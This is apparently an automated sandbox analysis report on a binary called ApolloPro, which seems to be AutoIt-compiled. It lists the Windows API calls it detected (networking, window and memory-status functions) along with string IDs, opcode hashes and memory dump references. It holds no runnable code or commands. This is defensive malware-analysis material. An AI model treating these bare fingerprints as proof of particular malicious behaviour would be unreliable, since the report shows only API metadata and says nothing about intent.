                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 295192089f4bc50b7b8291f065f40e57407d521e5de8764e826b3fd74a0a22e2
                                                                                              • Instruction ID: 3301782b1f063964bca5e20fc7d576e67a5e38b3baa256bccc55bfe486bd5f67
                                                                                              • Opcode Fuzzy Hash: 295192089f4bc50b7b8291f065f40e57407d521e5de8764e826b3fd74a0a22e2
                                                                                              • Instruction Fuzzy Hash: 87E0EEB1800204EFEB419FA1D808AADBBB2EB88310F119009F85AA7210CB3895529F90
                                                                                              APIs
                                                                                              • GetDesktopWindow.USER32 ref: 0067068D
                                                                                              • GetDC.USER32(00000000), ref: 00670697
                                                                                              • GetDeviceCaps.GDI32(00000000,0000000C), ref: 006706A3
                                                                                              • ReleaseDC.USER32(?), ref: 006706C4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsDesktopDeviceReleaseWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2889604237-0
                                                                                              • Opcode ID: 4eb7bfcb4bf04b17f816f3f5f84d813b910a38c0ea655e17c3d52e2ea560d711
                                                                                              • Instruction ID: 0168eb0755db6b908bcffb63b69622a77582f674400e40b185de65b2f9fd8539
                                                                                              • Opcode Fuzzy Hash: 4eb7bfcb4bf04b17f816f3f5f84d813b910a38c0ea655e17c3d52e2ea560d711
                                                                                              • Instruction Fuzzy Hash: B6E012B1800204EFEF519FA1D80CAADBBF2EF8C310F118008F95AA7210CB38A5528F90
                                                                                              APIs
                                                                                                • Part of subcall function 0064436A: _wcscpy.LIBCMT ref: 0064438D
                                                                                                • Part of subcall function 00634D37: __itow.LIBCMT ref: 00634D62
                                                                                                • Part of subcall function 00634D37: __swprintf.LIBCMT ref: 00634DAC
                                                                                              • __wcsnicmp.LIBCMT ref: 0069B670
                                                                                              • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0069B739
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                              • String ID: LPT
                                                                                              • API String ID: 3222508074-1350329615
                                                                                              • Opcode ID: ed546855bd743c874d5734d055f4555c818609e18841567a5af4a4ba6f5186ef
                                                                                              • Instruction ID: 355565cd15ceafad8e1187de098b102893f7385ff9bb0ceb29642ae51f100ccd
                                                                                              • Opcode Fuzzy Hash: ed546855bd743c874d5734d055f4555c818609e18841567a5af4a4ba6f5186ef
                                                                                              • Instruction Fuzzy Hash: 03619F75A00219AFCF14DF94D981EEEB7BAEF48710F108159F806AB791DB30AE41CB94
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memmove
                                                                                              • String ID: #Vd
                                                                                              • API String ID: 4104443479-1668578872
                                                                                              • Opcode ID: bf425eea91c95897429541e74b12317648fe4a7aa6ff16c3a3de390250f1b115
                                                                                              • Instruction ID: 81e63ea0bbc20dff971fecc7742c17bb622a67a825260572fe60fad3175e562a
                                                                                              • Opcode Fuzzy Hash: bf425eea91c95897429541e74b12317648fe4a7aa6ff16c3a3de390250f1b115
                                                                                              • Instruction Fuzzy Hash: 89514E70900619DFDB24CF68C890AEEBBB2FF45314F14852AE86AD7350E731A955CB51
                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000), ref: 0063E01E
                                                                                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 0063E037
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: GlobalMemorySleepStatus
                                                                                              • String ID: @
                                                                                              • API String ID: 2783356886-2766056989
                                                                                              • Opcode ID: ae7d06e013621a6dcbee34db6ec82d8af0b8d243f1e4a1874da8e11ec48fb269
                                                                                              • Instruction ID: 6e3d0fa09f2677484f6ed5310acaf2212b3d4929e55064408ce790e93b1aff1a
                                                                                              • Opcode Fuzzy Hash: ae7d06e013621a6dcbee34db6ec82d8af0b8d243f1e4a1874da8e11ec48fb269
                                                                                              • Instruction Fuzzy Hash: 6D515971408B449BE360AF50E885BABB7F9FF85314F41484EF1D941191DF70A9298B5A
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000027,00001132,00000000,?), ref: 006B8186
                                                                                              • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006B819B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: '
                                                                                              • API String ID: 3850602802-1997036262
                                                                                              • Opcode ID: 10a14d1360fa279acd0d93b5e70ae0addbe99b95d7862f75891dbc2b6133ee0b
                                                                                              • Instruction ID: e3109f3ca5addabe84782e1619158e5ecbfcf9ac08c523235b0c9678147b322f
                                                                                              • Opcode Fuzzy Hash: 10a14d1360fa279acd0d93b5e70ae0addbe99b95d7862f75891dbc2b6133ee0b
                                                                                              • Instruction Fuzzy Hash: 884110B4A0130A9FDB14DF68C881BDA7BBAFF09340F10416AE914DB351DB71A956CF90
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006A2C6A
                                                                                              • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 006A2CA0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: CrackInternet_memset
                                                                                              • String ID: |
                                                                                              • API String ID: 1413715105-2343686810
                                                                                              • Opcode ID: 0caa27aef2e777f537217d5e20b6dd698516c4f0e1c676f0d69c0ef98ea20887
                                                                                              • Instruction ID: 89d17639350648c04365886a68a8149fd784bc5d6f8bbf145c02468a69fd8a44
                                                                                              • Opcode Fuzzy Hash: 0caa27aef2e777f537217d5e20b6dd698516c4f0e1c676f0d69c0ef98ea20887
                                                                                              • Instruction Fuzzy Hash: 76311C71C00219ABCF51EFA4CC85AEEBFBAFF05314F100059F815AA262DB719956DFA4
                                                                                              APIs
                                                                                              • DestroyWindow.USER32(?,?,?,?), ref: 006B713C
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006B7178
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$DestroyMove
                                                                                              • String ID: static
                                                                                              • API String ID: 2139405536-2160076837
                                                                                              • Opcode ID: 4e59a8af455baa986eb7a2094674991a3e29b220f9cc2c31fca7e7b821633cd2
                                                                                              • Instruction ID: 1ce0fb6dbc8face461eb466dbb746c68f6668648106cd8a50ccf9b2f1d19af43
                                                                                              • Opcode Fuzzy Hash: 4e59a8af455baa986eb7a2094674991a3e29b220f9cc2c31fca7e7b821633cd2
                                                                                              • Instruction Fuzzy Hash: 66318FB1100604AEEB109F78CC80AFB77AAFF88724F10961DF99597291DA31AC81DB64
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006930B8
                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006930F3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 2223754486-4108050209
                                                                                              • Opcode ID: c4f936fc1c719b5dae2e581d0549559a432208fe79296436fb12ea6517a03409
                                                                                              • Instruction ID: 58c37e0f5914ceb8027378625d67f6d230454ca119ccc485a871554d2cdbcdda
                                                                                              • Opcode Fuzzy Hash: c4f936fc1c719b5dae2e581d0549559a432208fe79296436fb12ea6517a03409
                                                                                              • Instruction Fuzzy Hash: 66319131600219ABEF248F58C989BEEBBFEEB05794F144019ED85A77B1D7709B84CB50
                                                                                              APIs
                                                                                              • __snwprintf.LIBCMT ref: 006A4132
                                                                                                • Part of subcall function 00641A36: _memmove.LIBCMT ref: 00641A77
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: __snwprintf_memmove
                                                                                              • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                              • API String ID: 3506404897-2584243854
                                                                                              • Opcode ID: 7d942569fa4a5d639cd3c09846345cc0afd90f1a76521e47d47fba9fc3b7bdf0
                                                                                              • Instruction ID: daf1cb5efdef8db382efec6d2b91473ec62be0e3f6f254a7b275484ffedbbc44
                                                                                              • Opcode Fuzzy Hash: 7d942569fa4a5d639cd3c09846345cc0afd90f1a76521e47d47fba9fc3b7bdf0
                                                                                              • Instruction Fuzzy Hash: CE218030A0021DABCF10EFA4CC91AAE7BA6EF56340F440458F905AB242DB74AD85CFA5
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006B6D86
                                                                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006B6D91
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend
                                                                                              • String ID: Combobox
                                                                                              • API String ID: 3850602802-2096851135
                                                                                              • Opcode ID: 369634ce9ff9862e98bac86ba0f606d11cc14bd2202c16f3552615a3718b9824
                                                                                              • Instruction ID: 48bf456ae7b5ad1d22f0001f71b49bc0b8d32774eaa5088aa168786b4f34fd5e
                                                                                              • Opcode Fuzzy Hash: 369634ce9ff9862e98bac86ba0f606d11cc14bd2202c16f3552615a3718b9824
                                                                                              • Instruction Fuzzy Hash: E31160B1310209AFEF619E54DC91EFB3B6BEF84364F114129FA149B290D675AC9187A0
                                                                                              APIs
                                                                                                • Part of subcall function 00632111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0063214F
                                                                                                • Part of subcall function 00632111: GetStockObject.GDI32(00000011), ref: 00632163
                                                                                                • Part of subcall function 00632111: SendMessageW.USER32(00000000,00000030,00000000), ref: 0063216D
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 006B7296
                                                                                              • GetSysColor.USER32(00000012), ref: 006B72B0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                              • String ID: static
                                                                                              • API String ID: 1983116058-2160076837
                                                                                              • Opcode ID: 140097aaa06536e27bdbcebb0308751b8984070f6b95945a9aaf74806ceecf8e
                                                                                              • Instruction ID: 3a17f095369cc07cc9d8e150338be28b1d43339395e353fb1e8e544ecf05c781
                                                                                              • Opcode Fuzzy Hash: 140097aaa06536e27bdbcebb0308751b8984070f6b95945a9aaf74806ceecf8e
                                                                                              • Instruction Fuzzy Hash: 8421297261420AAFDB04DFB8CC45EFA7BA9EB48314F005518FD55D3250D735E891DB50
                                                                                              APIs
                                                                                              • GetWindowTextLengthW.USER32(00000000), ref: 006B6FC7
                                                                                              • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 006B6FD6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: LengthMessageSendTextWindow
                                                                                              • String ID: edit
                                                                                              • API String ID: 2978978980-2167791130
                                                                                              • Opcode ID: 2fee6f361302d1475eb7f67a05ff5daeecef0fc9ffdf77e7ba84c43bd849061c
                                                                                              • Instruction ID: 160a14bd47abd161520acecabf36c088f366bb2b468b3fe364ebbc04bda3139f
                                                                                              • Opcode Fuzzy Hash: 2fee6f361302d1475eb7f67a05ff5daeecef0fc9ffdf77e7ba84c43bd849061c
                                                                                              • Instruction Fuzzy Hash: 69116AB1110208ABEB509E64EC80EFB3B6FEB05368F504718FA65932E0C779DC91DB60
                                                                                              APIs
                                                                                              • _memset.LIBCMT ref: 006931C9
                                                                                              • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 006931E8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoItemMenu_memset
                                                                                              • String ID: 0
                                                                                              • API String ID: 2223754486-4108050209
                                                                                              • Opcode ID: 5011c31a84215659944a9513d44c21c963f6433c530dea87e20d70899955bde2
                                                                                              • Instruction ID: cf7f67a3050c72962c3dce548798f5d1d759d26fad2d182156d213e9e4b1f0e0
                                                                                              • Opcode Fuzzy Hash: 5011c31a84215659944a9513d44c21c963f6433c530dea87e20d70899955bde2
                                                                                              • Instruction Fuzzy Hash: 7211BE31900224ABDF20DA98DC45BE977BEEB05310F140125E816A77B0D770AF09DA92
                                                                                              APIs
                                                                                              • DeleteObject.GDI32(?), ref: 0063351D
                                                                                              • DestroyWindow.USER32(?,?,00644E61), ref: 00633576
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteDestroyObjectWindow
                                                                                              • String ID: hl
                                                                                              • API String ID: 2587070983-742643120
                                                                                              • Opcode ID: e2f1542c1e42b3e4c1ad4e7259031890e5b4046abcad2774a4f57846ada84fca
                                                                                              • Instruction ID: 629613e8f6d753b6f60ed0d15d1c8c0081ded23f9c39b868ebad93b2a2c07072
                                                                                              • Opcode Fuzzy Hash: e2f1542c1e42b3e4c1ad4e7259031890e5b4046abcad2774a4f57846ada84fca
                                                                                              • Instruction Fuzzy Hash: E6211770609220CFDB68EF18E858A7933E7BB45361F04616DE8168B3A1CB30DE41DBD5
                                                                                              APIs
                                                                                              • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 006A28F8
                                                                                              • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 006A2921
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: Internet$OpenOption
                                                                                              • String ID: <local>
                                                                                              • API String ID: 942729171-4266983199
                                                                                              • Opcode ID: 1632321696b3771d58faf2c00f5dbaf23adc4239c0652871133e23b28eb1dbbf
                                                                                              • Instruction ID: 7073826c6f51c3bbae591fbea6019f0d3120994ec027660f3d73583102493671
                                                                                              • Opcode Fuzzy Hash: 1632321696b3771d58faf2c00f5dbaf23adc4239c0652871133e23b28eb1dbbf
                                                                                              • Instruction Fuzzy Hash: 1911E770541226BAEB159F558C94EF7FB6DFF07750F10422AF50556100D3745C55DAF0
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: _wcscmp
                                                                                              • String ID: 0.0.0.0$L,l
                                                                                              • API String ID: 856254489-3484748455
                                                                                              • Opcode ID: 009adf3fb4d63dfc1f4b2129ff39ac9c44ca65b7d504305f076f9a8df3c8e25c
                                                                                              • Instruction ID: 505fedbc813e188a86ecbc4f93dc135dbf5aeb63e0a8154152e4e1dd7f9795b5
                                                                                              • Opcode Fuzzy Hash: 009adf3fb4d63dfc1f4b2129ff39ac9c44ca65b7d504305f076f9a8df3c8e25c
                                                                                              • Instruction Fuzzy Hash: B01191366002149FCB44EE15D981EAAB7BBEF88710F14805DF9096F7A1DA30FD46CB94
                                                                                              APIs
                                                                                                • Part of subcall function 006A86E0: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,006A849D,?,00000000,?,?), ref: 006A86F7
                                                                                              • inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006A84A0
                                                                                              • htons.WSOCK32(00000000,?,00000000), ref: 006A84DD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000012.00000002.2223230579.0000000000631000.00000020.00000001.01000000.00000009.sdmp, Offset: 00630000, based on PE: true
                                                                                              • Associated: 00000012.00000002.2223211304.0000000000630000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006C0000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223572930.00000000006E6000.00000002.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223663715.00000000006F0000.00000004.00000001.01000000.00000009.sdmp
                                                                                              • Associated: 00000012.00000002.2223686765.00000000006F9000.00000002.00000001.01000000.00000009.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_18_2_630000_ApolloPro.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharMultiWidehtonsinet_addr
                                                                                              • String ID: 255.255.255.255
                                                                                              • API String ID: 2496851823-2422070025
                                                                                              • Opcode ID: 51aa0286072c46e76acd524a37d8dc7915282a1e62f22a305a555f670e6bc8eb
                                                                                              • Instruction ID: 912d5cd2f15cd202f17f08426cdda3a19a4c793f28fcbefdb8d7e4d4a1cf713d
                                                                                              • Opcode Fuzzy Hash: 51aa0286072c46e76acd524a37d8dc7915282a1e62f22a305a555f670e6bc8eb
                                                                                              • Instruction Fuzzy Hash: 5811C274500206AFDB14FF64CC46FEEB766EF06310F10451AE91157282DB31AC14CBA9
                                                                                              APIs
